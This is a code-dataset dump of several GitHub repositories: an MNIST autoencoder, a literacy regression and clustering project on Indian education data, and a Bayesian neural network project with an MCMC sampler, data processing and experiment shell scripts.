range(int(traindata.shape[0]/batchsize)):\n x_batch = traindata[j*batchsize:(j+1)*batchsize]\n optimizer.zero_grad()\n pred = net(x_batch)\n loss = loss_func(pred, x_batch)\n loss_batch.append(loss.item())\n loss.backward() # model learns by backpropagation\n optimizer.step() # model updates its parameters\n if (j+1) % 100 == 0:\n print(\"EPOCH No: \", i+1, \" \", (j+1), \" Batches done\")\n pred = net(traindata)\n loss = loss_func(pred.squeeze(), traindata)\n loss_epoch.append(loss.item())\n print(\"Loss after EPOCH No \" + str(i+1) + \": \" + str(loss.item())) # prints loss\n return loss_epoch, loss_batch\n\n\n\ndef main():\n traindata = read_data()\n net, optimizer, loss_func, loss_init = dec_network(traindata)\n need_train = input(\"Enter 'm' to train model, anything else to load old model: \")\n if need_train == 'm' or need_train == 'M':\n loss_epoch, loss_batch = fit(net, traindata, optimizer, loss_func, loss_init)\n processdata.plot_graph(loss_epoch, loss_batch)\n need_save = input(\"Enter 's' to save model, anything else to not save: \")\n if need_save == 's' or need_save == 'S':\n print(\"Saving Model...\")\n torch.save(net.state_dict(), modelname)\n else:\n net.load_state_dict(torch.load(modelname))\n testdata = processdata.read_input_cnn('testdata.idx3')\n print(\"Original images are: \")\n img = numpy.asarray(testdata[imgcheck].squeeze())\n for i in range(1, 10):\n pic = numpy.asarray(testdata[imgcheck + i].squeeze())\n img = cv2.hconcat([img, pic])\n plt.axis('off')\n plt.imshow(img, cmap='Greys_r')\n plt.show()\n pred = net(testdata.reshape(-1, 784))\n loss = loss_func(pred.squeeze(), testdata.reshape(-1, 784))\n print(\"Final Loss on Test set is: \" + str(loss.item()))\n print(\"Regenerated images are: \")\n pred = pred.reshape(-1, 28, 28)\n img = pred[imgcheck].squeeze().detach().numpy()\n for i in range(1, 10):\n pic = pred[imgcheck + i].squeeze().detach().numpy()\n img = cv2.hconcat([img, pic])\n img = img.squeeze()\n plt.axis('off')\n plt.imshow(img, cmap='Greys_r')\n 
plt.show()\n return\n\n\n"
},
{
"alpha_fraction": 0.7083333134651184,
"alphanum_fraction": 0.7083333134651184,
"avg_line_length": 38.95833206176758,
"blob_id": "4c9bcab18c78d43c241bb11aa265652aba3f3626",
"content_id": "223861fdedb0ec0bf1e52745d9b3d4e272202805",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 960,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 24,
"path": "/README.md",
"repo_name": "mathurpulkit/Vanilla-Autoencoders",
"src_encoding": "UTF-8",
"text": "# Autoencoders MNIST Project\n\n#### This is a repository demonstrating a vanilla Autoencoder using MNIST dataset.\n\n#### Autoencoders are used for creating a compressed representation of the given data while retaining the original quality of the data.\n\n#### Here are some examples generated using the model given in code:\n\nNetwork Type | Fully Connected Layers | Convolution Neural Networks\n:----------------|----------------|----------------:\nOriginal |  | \nReconstructed |  | \n\n#### Here are the Loss graphs for Fully connected Layers:\n\n\n\n\n\n#### Here are the Loss graphs for Convolutional Neural Networks:\n\n\n\n\n\n"
}
] | 5 |
abuzarbagewadi/SummerProject1 | https://github.com/abuzarbagewadi/SummerProject1 | dde090c1b8660150ab21b6d38cbf9e1b9d0711fb | 0b34e336bdb28b155622b7c21514881308507a7a | 1f59afcd90cefb8a4abd38278855a7ad6c0cdd2c | refs/heads/master | 2022-11-13T09:22:11.174486 | 2020-06-28T08:55:39 | 2020-06-28T08:55:39 | 268,112,720 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8383838534355164,
"alphanum_fraction": 0.8484848737716675,
"avg_line_length": 48,
"blob_id": "d3d7dfb4275f43a8bf43c798725aee7a65925488",
"content_id": "33d0272860eb0fd9aab5945b8a19bbbf6b32a298",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 99,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 2,
"path": "/README.md",
"repo_name": "abuzarbagewadi/SummerProject1",
"src_encoding": "UTF-8",
"text": "# SummerProject1\nMachine Learning model predicting educated people in various areas accross India \n"
},
{
"alpha_fraction": 0.6674132347106934,
"alphanum_fraction": 0.6998879909515381,
"avg_line_length": 28.27118682861328,
"blob_id": "022ba9976a6e525745c3f8b5ef1f7cac96cd3f3a",
"content_id": "7fdb1ef0c843b49950ab34f38b87cc9b5024327b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1786,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 59,
"path": "/Final _MULTIReg.py",
"repo_name": "abuzarbagewadi/SummerProject1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat May 30 20:30:20 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nSpyder Editor\r\n\r\nThis is a temporary script file.\r\n\"\"\"\r\n# Multiple Linear Regression\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Importing the dataset\r\ndataset = pd.read_csv('latestedu.csv')\r\nX = dataset.iloc[:, :-1].values\r\ny = dataset.iloc[:, 28].values\r\n\r\n# Taking care of missing data\r\nfrom sklearn.impute import SimpleImputer\r\nimputer = SimpleImputer(missing_values=np.nan, strategy='mean')\r\nimputer.fit(X[:, 1:29])\r\nX[:, 1:28] = imputer.transform(X[:, 1:28])\r\n\r\n\"\"\"\r\n# Encoding categorical data\r\nfrom sklearn.compose import ColumnTransformer\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nct = ColumnTransformer(transformers=[('encoder', OneHotEncoder(), [3])], remainder='passthrough')\r\nX = np.array(ct.fit_transform(X))\r\nprint(X) \"\"\"\r\n\r\n# Splitting the dataset into the Training set and Test set\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\r\n\r\n# Training the Multiple Linear Regression model on the Training set\r\nfrom sklearn.linear_model import LinearRegression\r\nregressor = LinearRegression()\r\nregressor.fit(X_train, y_train)\r\n\r\n# Predicting the Test set results\r\ny_pred = regressor.predict(X_test)\r\nnp.set_printoptions(precision=2)\r\nprint(np.concatenate((y_pred.reshape(len(y_pred),1), y_test.reshape(len(y_test),1)),1))\r\n\r\n#using backward elimination\r\nimport statsmodels.api as sm\r\nX = np.append(arr = np.ones((590, 1)).astype(int), values = X, axis = 1)\r\nX_opt = X[:, [8,10,11,12,13,14,15,20,21,27]]\r\nregressor_OLS =sm.OLS(endog = y, exog = X_opt).fit()\r\nregressor_OLS.summary()\r\n"
},
{
"alpha_fraction": 0.5934135317802429,
"alphanum_fraction": 0.6364787817001343,
"avg_line_length": 31.595745086669922,
"blob_id": "bd2429f44d1bdb69c0b25fe495eaeb92933bf949",
"content_id": "c0e63187e12ede143b2bf1efcfcfa000bff14afc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1579,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 47,
"path": "/KMeaClust(LiteracyVSPersonsPerInstitution).py",
"repo_name": "abuzarbagewadi/SummerProject1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 31 00:12:59 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\ndataset = pd.read_csv('latestedu.csv')\r\nX = dataset.iloc[:, [23, 30]].values\r\n\r\nfrom sklearn.impute import SimpleImputer\r\nimputer = SimpleImputer(missing_values=np.nan, strategy='mean')\r\nimputer.fit(X[:, 1:32])\r\nX[:, 1:32] = imputer.transform(X[:, 1:32])\r\n\r\n\r\n\r\nfrom sklearn.cluster import KMeans\r\nwcss = []\r\nfor i in range(1, 11):\r\n kmeans = KMeans(n_clusters = i, init = 'k-means++', random_state = 0)\r\n kmeans.fit(X)\r\n wcss.append(kmeans.inertia_)\r\nplt.plot(range(1, 11), wcss)\r\nplt.title('The Elbow Method')\r\nplt.xlabel('Number of clusters')\r\nplt.ylabel('WCSS')\r\nplt.show()\r\n\r\nkmeans = KMeans(n_clusters = 4, init = 'k-means++', random_state = 0)\r\ny_kmeans = kmeans.fit_predict(X)\r\n\r\n\r\nplt.scatter(X[y_kmeans == 0, 0], X[y_kmeans == 0, 1], s = 100, c = 'red', label = 'Significant Increase in Budget')\r\nplt.scatter(X[y_kmeans == 1, 0], X[y_kmeans == 1, 1], s = 100, c = 'blue', label = 'Considerable Increase in Budget')\r\nplt.scatter(X[y_kmeans == 2, 0], X[y_kmeans == 2, 1], s = 100, c = 'green', label = 'Moderate increase n Budget')\r\nplt.scatter(X[y_kmeans == 3, 0], X[y_kmeans == 3, 1], s = 100, c = 'cyan', label = 'Low increase in Budget')\r\nplt.scatter(kmeans.cluster_centers_[:, 0], kmeans.cluster_centers_[:, 1], s = 300, c = 'yellow', label = 'Centroids')\r\nplt.title('Population of Education')\r\nplt.xlabel('Literacy Rate')\r\nplt.ylabel('Persons per Institution')\r\nplt.legend()\r\nplt.show()\r\n"
},
{
"alpha_fraction": 0.6090909242630005,
"alphanum_fraction": 0.6495867967605591,
"avg_line_length": 26.13953399658203,
"blob_id": "b22db79de0d2bf04238af8354d47b019f85a3e62",
"content_id": "4cea195149b4912d1bd284428fb1db6011655bfc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1210,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 43,
"path": "/H_Clust(LiteracyVSPersonsPerInstitution).py",
"repo_name": "abuzarbagewadi/SummerProject1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 10 14:18:28 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n\r\ndataset = pd.read_csv('UpdatedDataset1.csv')\r\nX = dataset.iloc[:, [23, 30]].values\r\n\r\n\r\nfrom sklearn.impute import SimpleImputer\r\nimputer = SimpleImputer(missing_values=np.nan, strategy='mean')\r\nimputer.fit(X[:, 0:34])\r\nX[:, 0:34] = imputer.transform(X[:, 0:34])\r\n\r\n\r\nimport scipy.cluster.hierarchy as sch\r\ndendrogram = sch.dendrogram(sch.linkage(X, method = 'ward'))\r\nplt.title('Dendrogram')\r\nplt.xlabel('Literacy')\r\nplt.ylabel('Euclidean distances')\r\nplt.show()\r\n\r\nfrom sklearn.cluster import AgglomerativeClustering\r\nhc = AgglomerativeClustering(n_clusters = 3, affinity = 'euclidean', linkage = 'ward')\r\ny_hc = hc.fit_predict(X)\r\n\r\nplt.scatter(X[y_hc == 0, 0], X[y_hc == 0, 1], s = 100, c = 'red', label = 'Very Low Literacy')\r\nplt.scatter(X[y_hc == 1, 0], X[y_hc == 1, 1], s = 100, c = 'blue', label = 'Average Literacy ')\r\nplt.scatter(X[y_hc == 2, 0], X[y_hc == 2, 1], s = 100, c = 'green', label = 'Above Average Literacy')\r\nplt.title('')\r\nplt.xlabel('Literacy')\r\nplt.ylabel('Persons Per Institution')\r\nplt.legend()\r\nplt.show()\r\n"
},
{
"alpha_fraction": 0.634782612323761,
"alphanum_fraction": 0.6713043451309204,
"avg_line_length": 25.380952835083008,
"blob_id": "0475fb128ef7cc6c2d124a148633965169808fdd",
"content_id": "c0342a17bad63dbf7e39c1077ddfa8a310829dc0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1150,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 42,
"path": "/H_Clust(EducationVSMedInst).py",
"repo_name": "abuzarbagewadi/SummerProject1",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jun 10 14:10:02 2020\r\n\r\n@author: Admin\r\n\"\"\"\r\n\r\n\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\ndataset = pd.read_csv('UpdatedDataset1.csv')\r\nX = dataset.iloc[:, [30, 32]].values\r\n\r\n\r\nfrom sklearn.impute import SimpleImputer\r\nimputer = SimpleImputer(missing_values=np.nan, strategy='mean')\r\nimputer.fit(X[:, 0:34])\r\nX[:, 0:34] = imputer.transform(X[:, 0:34])\r\n\r\nimport scipy.cluster.hierarchy as sch\r\ndendrogram = sch.dendrogram(sch.linkage(X, method = 'ward'))\r\nplt.title('Dendrogram')\r\nplt.xlabel('Customers')\r\nplt.ylabel('Educational Institutions')\r\nplt.show()\r\n\r\nfrom sklearn.cluster import AgglomerativeClustering\r\nhc = AgglomerativeClustering(n_clusters = 3, affinity = 'euclidean', linkage = 'ward')\r\ny_hc = hc.fit_predict(X)\r\n\r\nplt.scatter(X[y_hc == 0, 0], X[y_hc == 0, 1], s = 100, c = 'red', label = 'Poor Facilities')\r\nplt.scatter(X[y_hc == 1, 0], X[y_hc == 1, 1], s = 100, c = 'blue', label = 'Accepatable Facilities')\r\n\r\n\r\nplt.title('Table Of Institutions')\r\nplt.xlabel('Educational Institutions')\r\nplt.ylabel('Medical Institutions')\r\nplt.legend()\r\nplt.show()\r\n"
}
] | 5 |
john-hawkins/Bayesian_Neural_Networks | https://github.com/john-hawkins/Bayesian_Neural_Networks | 8ada8d75750753cc09c3651137b580215af803cb | 301463d1779e020fd0dd2b95e19827bddf84c6b3 | f10069ccd35e6581d11bdfc4929050491c1cca16 | refs/heads/master | 2021-06-19T20:40:34.318716 | 2019-10-08T05:09:22 | 2019-10-08T05:09:22 | 148,849,995 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5554519891738892,
"alphanum_fraction": 0.6067101359367371,
"avg_line_length": 37.28571319580078,
"blob_id": "b67a1c7a6477fd4f50173e53bcd300826a7f3dc5",
"content_id": "c9f73e2518dde2ea1361a0d155d907ea2c0b20b3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1073,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 28,
"path": "/data/Beijing/process_simple.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport datetime\n\ndf = pd.read_csv('data.csv')\ndf2 = df[24:].copy()\ndf2['N'] = np.where(df2.cbwd.str[0:1]=='N', 1, 0)\ndf2['S'] = np.where(df2.cbwd.str[0:1]=='S', 1, 0)\ndf2['E'] = np.where(df2.cbwd.str[1:2]=='E', 1, 0)\ndf2['W'] = np.where(df2.cbwd.str[1:2]=='W', 1, 0)\ndf2.drop([\"cbwd\"],axis = 1, inplace = True) \n\n# WHERE PM2.5 IS ZERO - POTENTIAL MEASUREMENT LIMIT ERROR - REPLACE WITH NOMINAL SMALL VALUE\ndefault_value = 0.01\ndf2[\"pm2.5\"] = np.where(df2[\"pm2.5\"] == 0, default_value,df2[\"pm2.5\"] )\n\ndf2['Date'] = df['year'].astype(str) + \"-\" + df['month'].astype(str) + \"-\" + df['day'].astype(str) + \" \" + df['hour'].astype(str) + \":00\"\n\ndf2['Date'] = df2.apply( lambda x : datetime.datetime(year=x['year'], month=x['month'], day=x['day'], hour=x['hour']).strftime(\"%Y-%m-%d %H:%M:00\"), axis=1 )\n\nfeatures = df2.columns.tolist()\nunwanted = [\"No\", \"year\", \"month\", \"day\"]\nfor x in unwanted :\n features.remove(x)\n\nfinal = df2.loc[:,features]\n\nfinal.to_csv('sets/withDate.csv', sep=',', encoding='utf-8', index=False, header=True)\n\n"
},
{
"alpha_fraction": 0.6632996797561646,
"alphanum_fraction": 0.7239057421684265,
"avg_line_length": 20.071428298950195,
"blob_id": "6f8f9f01cd6d1cd71a13c2ccba94afdf6c52383d",
"content_id": "99b53f56bd6510bc2c68ffe9c37c5d71b12d5388",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 297,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 14,
"path": "/experiments/RUN_Beijing.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n\n#./RUN_BeiJing_24hr_SLP.sh\n#./RUN_BeiJing_24hr_FFNN.sh\n#./RUN_BeiJing_24hr_LangevinFFNN.sh\n\n./RUN_BeiJing_7day_SLP.sh\n./RUN_BeiJing_7day_FFNN_H5.sh\n./RUN_BeiJing_7day_FFNN_H10.sh\n./RUN_BeiJing_7day_FFNN_H15.sh\n./RUN_BeiJing_7day_DeepFFNN_H5.sh\n\n#./RUN_BeiJing_7day_LangevinFFNN.sh\n\n\n"
},
{
"alpha_fraction": 0.5318113565444946,
"alphanum_fraction": 0.5387133955955505,
"avg_line_length": 42.29118728637695,
"blob_id": "cec83969f6e2a159875c940f865050735779d541",
"content_id": "cc8e29109aeb5017a2651c7319e7051756476cf5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11303,
"license_type": "no_license",
"max_line_length": 192,
"num_lines": 261,
"path": "/src/MCMC.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport random\nimport datetime\nimport time\nimport math\nimport os\n\n#-------------------------------------------------------------------------------\n# DEFINE A MARKOV CHAIN MONTE CARLO CLASS\n# SPECIFIC FOR THE NEURAL NETWORK CLASS HIERARCHY \n#-------------------------------------------------------------------------------\nclass MCMC:\n def __init__(self, samples, traindata, testdata, neuralnetwork, resultsdir, eval_metric):\n self.samples = samples \n self.neuralnet = neuralnetwork\n self.traindata = traindata\n self.testdata = testdata\n self.resultsdir = resultsdir\n self.eval_metric = eval_metric\n self.ensure_resultsdir()\n\n def ensure_resultsdir(self):\n directory = os.path.dirname(self.resultsdir)\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n def rmse(self, predictions, targets):\n return np.sqrt(((predictions - targets) ** 2).mean())\n\n def mae(self, predictions, targets):\n return (np.abs(predictions - targets)).mean()\n\n def mape(self, predictions, targets):\n return (np.abs(predictions - targets)/(targets+0.0000001)).mean()\n\n def reduce_data(self, data, incl):\n fltre = incl>0\n return data[fltre]\n\n def modify_included_data(self, incl):\n newincl = incl.copy()\n pos = random.choice(list(range(0, len(incl))))\n if newincl[pos]==0: \n newincl[pos]=1\n else: \n newincl[pos]=0\n return newincl\n\n def get_indecies(self, arr, val):\n return np.where(arr == val)[0]\n\n def modify_included_dataV2(self, incl):\n newincl = incl.copy()\n # DETERMINE WHETHER TO ADD OR REMOVE DATA\n action = random.uniform(0, 1)\n if (action< 0.5) :\n ind = self.get_indecies(incl, 0)\n newval = 1\n else: \n ind = self.get_indecies(incl, 1)\n newval = 0\n if (len(ind) == 0):\n return newincl\n pos_ind = random.choice(list(range(0, len(ind))))\n pos = ind[pos_ind]\n newincl[pos]=newval\n return newincl\n\n ########################################################################################\n # \n ########################################################################################\n def print(self):\n print(\"Training data:\", len(self.traindata) )\n print(\"Testing data:\", len(self.testdata) )\n\n\n ########################################################################################\n # \n ########################################################################################\n def printProgressBar (self, iteration, total, prefix = '', suffix = '', decimals = 1, length = 100, fill = '█'):\n \"\"\"\n Call in a loop to create terminal progress bar\n @params:\n iteration - Required : current iteration (Int)\n total - Required : total iterations (Int)\n prefix - Optional : prefix string (Str)\n suffix - Optional : suffix string (Str)\n decimals - Optional : positive number of decimals in percent complete (Int)\n length - Optional : character length of bar (Int)\n fill - Optional : bar fill character (Str)\n \"\"\"\n percent = (\"{0:.\" + str(decimals) + \"f}\").format(100 * (iteration / float(total)))\n filledLength = int(length * iteration // total)\n bar = fill * filledLength + '-' * (length - filledLength)\n print('\\r%s |%s| %s%% %s' % (prefix, bar, percent, suffix), end = '\\r')\n # Print New Line on Complete\n if iteration == total: \n print()\n\n\n ########################################################################################\n # LOGGING UTILITIES\n ########################################################################################\n def start_log_file(self):\n self.logfile = 
self.resultsdir + \"log.txt\"\n self.outlog = open(self.logfile, 'w')\n\n def write_log_entry(self, iteration, message):\n st = datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')\n self.outlog.write(st + \"\\t\" + str(iteration) + \"\\t\" + message + \"\\r\\n\")\n self.outlog.flush()\n\n def close_log(self):\n self.outlog.close()\n\n\n ########################################################################################\n # FUNCTIONS FOR WRITING OUT THE TEST PREDICTIONS\n ########################################################################################\n def start_test_file(self):\n self.test_file_name = self.resultsdir + \"test_predictions.tsv\"\n self.test_file = open(self.test_file_name, \"w\")\n\n def write_test_entry(self, results):\n temp = \" \".join(map(str, results))\n self.test_file.write( temp + \"\\r\\n\")\n self.test_file.flush()\n\n def close_test_file(self):\n self.test_file.close()\n\n ########################################################################################\n # RUN THE MCMC SAMPLER\n ########################################################################################\n def sampler(self):\n self.start_log_file()\n self.printProgressBar(0, self.samples, prefix = 'Progress:', suffix = 'Complete', length = 50)\n self.write_log_entry(0, \"Initialising...\")\n\n # How many training and test points? \n # shape[0] Returns the first dimension of the array\n # In this instance it is the number of discrete (x,y) combinations in the data set\n testsize = self.testdata.shape[0]\n trainsize = self.traindata.shape[0]\n\n # Samples is the number of samples we are going to take in the run of MCMC\n samples = self.samples\n\n # Copy the y values into an independent vector\n y_test = self.testdata[:, self.neuralnet.input]\n y_train = self.traindata[:, self.neuralnet.input]\n\n self.write_log_entry(0, \"Training data size:\" + str(y_train.size) )\n self.write_log_entry(0, \"Testing data size:\" + str(y_test.size) )\n\n # The total number of parameters for the neural network\n w_size = self.neuralnet.get_weight_vector_length()\n\n\t# Posterior distribution of all weights and bias over all samples\n\t# We will take 'samples' number of samples\n\t# and there will be a total of 'w_size' parameters in the model.\n # We collect this because it will hold the empirical data for our \n # estimate of the posterior distribution. \n pos_w = np.ones((samples, w_size))\n\n # TAU IS THE STANDARD DEVIATION OF THE ERROR IN THE DATA GENERATING FUNCTIONS\n # I.E. 
WE ASSUME THAT THE MODEL WILL BE TRYING TO LEARN SOME FUNCTION F(X)\n\t# AND THAT THE OBSERVED VALUES Y = F(X) + E\n # THEN TAU IS THE STANDARD DEVIATION OF E\n # WE STORE THE POSTERIOR DISTRIBUTION OF TAU - AS GENERATED BY THE MCMC PROCESS \n pos_tau = np.ones((samples, 1))\n\n\t# F(X) BUFFER - ALL NETWORK OUTPUTS WILL BE STORED HERE\n # REMOVED BECAUSE THE MEMEORY CONSTRAINT WAS TOO HIGH FOR LARGE DATASETS\n # TODO: CONSIDER WRITING DIRECTLY TO DISK EVERY SO OFTEN\n #fxtrain_samples = np.ones((samples, trainsize)) \n #fxtest_samples = np.ones((samples, testsize)) \n\n\t# STORE EVAL METRIC FOR EVERY STEP AS THE MCMC PROGRESSES\n eval_train = np.zeros(samples)\n eval_test = np.zeros(samples)\n\n\t# WE INITIALISE THE WEIGHTS RANDOMLY \n w = np.random.randn(w_size)\n w_proposal = np.random.randn(w_size)\n self.write_log_entry(0, \"Weights Initialised\" )\n\n [pred_train, etrain] = self.neuralnet.evaluate_proposal(self.traindata, w)\n [pred_test, etest] = self.neuralnet.evaluate_proposal(self.testdata, w)\n\n self.write_log_entry(0, \"Initial Weights\" + \"\\tTrain \" + self.eval_metric + \": \" + str(etrain) + \"\\tTest\" + self.eval_metric + \":\" + str(etest))\n\n\t# INITIAL VALUE OF TAU IS BASED ON THE ERROR OF THE INITIAL NETWORK ON TRAINING DATA\n\t# ETA - IS USED FOR DOING THE RANDOM WALK SO THAT WE CAN ADD OR SUBTRACT RANDOM VALUES\n\t# SUPPORT OVER [-INF, INF]\n\t# IT WILL BE EXPONENTIATED TO GET tau_squared of the proposal WITH SUPPORT OVER [0, INF] \n eta = np.log(np.var(pred_train - y_train))\n tausq = np.exp(eta)\n \n self.write_log_entry(0, \"Initial Error Dist\" + \"\\tEta \" + str(eta) + \"\\tTau^2:\" + str(tausq))\n\n likelihood = self.neuralnet.get_log_likelihood(self.traindata, w, tausq)\n\n self.write_log_entry(0, 'Initial Likelihood: ' + str(likelihood) )\n naccept = 0\n self.write_log_entry(0, 'Begin sampling using MCMC random walk')\n\n # START A FILE TO STORE ALL PREDICTIONS FOR THE TEST DATA\n self.start_test_file()\n prev_result = pred_test\n\n for i in range(samples - 1):\n self.printProgressBar(i + 1, samples, prefix = 'Progress:', suffix = 'Complete', length = 50)\n \n #w_proposal = self.neuralnet.get_proposal_weight_vector(w)\n #[eta_pro, tau_pro] = self.neuralnet.get_proposal_tau(eta)\n #[pred_train, rmsetrain] = self.neuralnet.evaluate_proposal(self.traindata, w_proposal)\n #[pred_test, rmsetest] = self.neuralnet.evaluate_proposal(self.testdata, w_proposal) \n #mh_prob = self.neuralnet.get_acceptance_probability(w_proposal, tau_pro, w, tausq, self.traindata)\n \n [w_proposal, eta_pro, tau_pro, pred_train, etrain, pred_test, etest, mh_prob] = self.neuralnet.get_proposal_and_acceptance_probability(w, eta, tausq, self.traindata, self.testdata)\n\n u = random.uniform(0, 1)\n\n if u < mh_prob:\n # Update position\n self.write_log_entry(i, \"Proposal Accepted\" + \"\\tTrain \" + self.eval_metric + \": \" + str(etrain) + \"\\tTest \" + self.eval_metric + \": \" + str(etest))\n naccept += 1\n w = w_proposal\n eta = eta_pro\n tausq = tau_pro\n\n pos_w[i + 1,] = w_proposal\n pos_tau[i + 1,] = tau_pro\n #fxtrain_samples[i + 1,] = pred_train\n #fxtest_samples[i + 1,] = pred_test\n self.write_test_entry(pred_test)\n prev_result = pred_test\n eval_train[i + 1,] = etrain\n eval_test[i + 1,] = etest\n\n else:\n pos_w[i + 1,] = pos_w[i,]\n pos_tau[i + 1,] = pos_tau[i,]\n #fxtrain_samples[i + 1,] = fxtrain_samples[i,]\n #fxtest_samples[i + 1,] = fxtest_samples[i,]\n self.write_test_entry(prev_result)\n eval_train[i + 1,] = eval_train[i,]\n eval_test[i + 1,] = eval_test[i,]\n 
self.write_log_entry( i, \"Proposal Rejected\")\n\n self.write_log_entry(samples, str(naccept) + ' Accepted Samples')\n self.write_log_entry(samples, \"Acceptance Rate:\" + str(100 * naccept/(samples * 1.0)) + '%')\n accept_ratio = naccept / (samples * 1.0)\n self.close_log()\n self.close_test_file()\n\n #return (pos_w, pos_tau, fxtrain_samples, fxtest_samples, x_train, x_test, rmse_train, rmse_test, accept_ratio)\n \n return (pos_w, pos_tau, eval_train, eval_test, accept_ratio, self.test_file_name)\n \n"
},
{
"alpha_fraction": 0.6835839748382568,
"alphanum_fraction": 0.7180451154708862,
"avg_line_length": 36.093021392822266,
"blob_id": "19c2939ccb25dae7c69cb2d0a7cd509a4a2151bb",
"content_id": "797872a0c00c58dd54ab04aaf9b4c83657a897c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1596,
"license_type": "no_license",
"max_line_length": 206,
"num_lines": 43,
"path": "/TEST_TRANSFORM_SCRIPT.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# THESE SIMPLE TESTS ENSURE THAT THE RESULTS MODIFICATION SCRIPTS FUNCTION AS EXPECTED\n\npython transform_test_results.py \"tests/test_01_result.csv\" \"tests/Test_01/test_predictions.tsv\" \"tests/Test_01/test_data.csv\" \"tests/Test_01/config.yaml\" False False False False target_value current_value \n\npython transform_test_results.py \"tests/test_02_result.csv\" \"tests/Test_02/test_predictions.tsv\" \"tests/Test_02/test_data.csv\" \"tests/Test_02/config.yaml\" True False False False target_value current_value \n\npython transform_test_results.py \"tests/test_03_result.csv\" \"tests/Test_03/test_predictions.tsv\" \"tests/Test_03/test_data.csv\" \"tests/Test_03/config.yaml\" False True False False target_value current_value \n\npython transform_test_results.py \"tests/test_04_result.csv\" \"tests/Test_04/test_predictions.tsv\" \"tests/Test_04/test_data.csv\" \"tests/Test_04/config.yaml\" False False True True target_value current_value \n\nFAILED=\"False\"\nDIFF=\"$(diff \"./tests/test_01_result.csv\" \"./tests/test_02_result.csv\")\"\nif [ \"$DIFF\" != \"\" ] \nthen\n echo \"TEST 2 LIKELY FAILED\"\n FAILED='True'\nfi\n\nDIFF=\"$(diff \"./tests/test_01_result.csv\" \"./tests/test_03_result.csv\")\"\nif [ \"$DIFF\" != \"\" ]\nthen\n echo \"TEST 3 LIKELY FAILED\"\n FAILED='True'\nfi\n\nDIFF=\"$(diff \"./tests/test_01_result.csv\" \"./tests/test_04_result.csv\")\"\nif [ \"$DIFF\" != \"\" ]\nthen\n echo \"TEST 4 LIKELY FAILED\"\n FAILED='True'\nfi\n\nif [ \"$FAILED\" == \"False\" ]\nthen\n echo \"ALL TRANSFORM TESTS PASSED\"\nfi\n\n#rm tests/test_01_result.csv\n#rm tests/test_02_result.csv\n#rm tests/test_03_result.csv\n#rm tests/test_04_result.csv\n\n"
},
{
"alpha_fraction": 0.5504014492034912,
"alphanum_fraction": 0.5762711763381958,
"avg_line_length": 38.28070068359375,
"blob_id": "3164cf1199bd718355c4f0abf279ca8374f17162",
"content_id": "9edc572e62f92f4e19b83c33e071c0e5e4c83a06",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2242,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 57,
"path": "/data/Delhi/process_7_day_joined.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
